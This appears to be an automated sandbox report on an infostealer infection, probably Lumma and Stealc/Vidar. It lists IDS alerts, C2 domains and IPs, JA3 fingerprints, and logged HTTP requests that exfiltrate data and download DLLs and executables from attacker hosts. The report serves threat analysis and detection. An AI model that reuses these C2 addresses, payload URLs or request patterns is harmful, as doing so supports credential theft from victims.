Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.5:49719
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49742 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49742 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49748 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49748 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49750 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49750 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49755 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49755 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49753 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49753 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.5:49762
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.5:49761
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49752 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49752 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 172.67.162.108 172.67.162.108
Source: Joe Sandbox View	IP Address: 172.67.132.32 172.67.132.32

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49718 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49722 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49721 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49719 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49720 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49716 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49717 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49724 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49723 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49726 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49727 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49728 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49729 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49731 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49730 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49725 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49737 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49732 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49740 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49761 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49746 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49764 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49760 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49763 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49759 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49758 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49762 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49749 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49765 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49766 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49739 -> 172.105.54.160:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49743 -> 172.105.54.160:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 5753Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGIIJDGHCAKFHJEHCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 113457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: GET /vdshfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 5637Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3209Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_00406963

